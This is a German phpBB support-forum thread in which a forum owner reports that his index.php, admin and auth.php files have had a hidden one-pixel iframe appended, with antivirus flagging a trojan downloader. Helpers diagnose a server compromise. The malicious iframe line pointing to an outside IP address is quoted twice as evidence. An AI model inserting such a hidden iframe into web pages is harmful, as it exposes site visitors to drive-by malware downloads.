Dateigröße der index.php

Fragen zur Bedienung von phpBB 3.0.x, Probleme bei der Benutzung und alle weiteren Fragen inkl. Update auf die neuste phpBB 3.0.14 Version
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
darkwave
Mitglied
Beiträge: 30
Registriert: 05.01.2007 07:34
Kontaktdaten:

Dateigröße der index.php

Beitrag von darkwave »

Meine Frage geht dahin, ob die "index.php" nach der Installation etwas größer ist als in der gepackten uninstallierten Version.

Die Datei in dem zip File ist 4931 kb groß und nach der Installierung ist sie jetzt bei mir 5169 kb groß.

Außerdem ist in der "index.php" in der installierten Version folgende Zeile enthalten am Ende des Quelltextes.

Code: Alles auswählen

<iframe src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
Dazu kommt bei mir jedesmal, wenn ich mein Forum aufrufe eine Meldung von Kaspersky Antivirus und meldet mir folgendes:

Code: Alles auswählen

Trojan-Downloader.JS.Agent.ep
Benutzeravatar
The Ripper
Mitglied
Beiträge: 20
Registriert: 03.02.2007 20:46
Kontaktdaten:

Beitrag von The Ripper »

von wo hast du denn die datei gedownloadet??
meine ist 5kb groß. bist du dir sicher das du dich nicht verschaut hast?

Code: Alles auswählen

<iframe src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
diese zeile ist bei mir nicht vorhanden, allerdings die virus meldung erscheint bei mir (auch kaspersky) auch.
Besucht mal meine Seite unter
http://www.b-ae-m.dl.am
Modest
Mitglied
Beiträge: 176
Registriert: 26.03.2007 19:29

Beitrag von Modest »

ich glaube du meinst Bytes und nicht kilobytes
Homepage:
http://pugf.pu.funpic.de wird später mal http://www.Pixel2Prog.de wenn alles fertig ist^^
Benutzeravatar
Dr.Death
Moderator
Moderator
Beiträge: 17473
Registriert: 23.04.2003 08:22
Wohnort: Xanten
Kontaktdaten:

Beitrag von Dr.Death »

Mal bitte hier vorbei schauen:
http://www.phpbb.de/viewtopic.php?p=876335#876335

Du hast Dir warscheinlich einen Virus / Trojaner zugelegt.
darkwave
Mitglied
Beiträge: 30
Registriert: 05.01.2007 07:34
Kontaktdaten:

Beitrag von darkwave »

Modest hat geschrieben:ich glaube du meinst Bytes und nicht kilobytes
ja natürlich meinte ich bytes und nicht KB - ist auf die schnelle schief gegangen :grin: .

danke für die Tipps
darkwave
Mitglied
Beiträge: 30
Registriert: 05.01.2007 07:34
Kontaktdaten:

Beitrag von darkwave »

Eine ähnliche Zeile, wie oben schon mal angegeben, war heute wieder bei mir im Forum. Die Zeile wird immer in die index.php im Rootverzeichnis geschrieben und in die index.php im adm-Verzeichnis.

In wie weit nur mein Forum betroffen ist kann ich nicht sagen, aber es gibt noch einen interessanten Beitrag zu einem Virusproblem. http://www.viruslist.com/de/news?id=201611620.
darkwave
Mitglied
Beiträge: 30
Registriert: 05.01.2007 07:34
Kontaktdaten:

Beitrag von darkwave »

Ich möchte nur noch einmal darauf hinweisen, dass die Zeile in dem etwas weiter oben angeführten Code-Bereich in meinem Forum in fast jeder "index" Datei zu finden war. Das sind die "index.php" im Root und "adm" Ordner, sowie die "index.htm" Files in fast jedem Ordner der eine Ebene unter dem Root liegt. Desweiteren war die Zeile in den beiden "auth.php" Files enthalten im "includes" Verzeichnis, sowie im "includes/acp" Verzeichnis.
Benutzeravatar
larsneo
Mitglied
Beiträge: 2622
Registriert: 07.03.2002 15:23
Wohnort: schwäbisch gmünd
Kontaktdaten:

Beitrag von larsneo »

ergo hast du ein ernsthaftes sicherheitsproblem - entweder aufgrund der eingesetzten software und/oder aufgrund einer schlechten serverkonfiguration.
- was für software setzt du auf dem webspace ein?
- kontrolliere mal das server-enviroment mit phpsecinfo
- überprüfe mal die logfiles auf verdächtige zugriffe (aka remote code injection, remote code upload etc)
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
Antworten

Zurück zu „[3.0.x] Administration, Benutzung und Betrieb“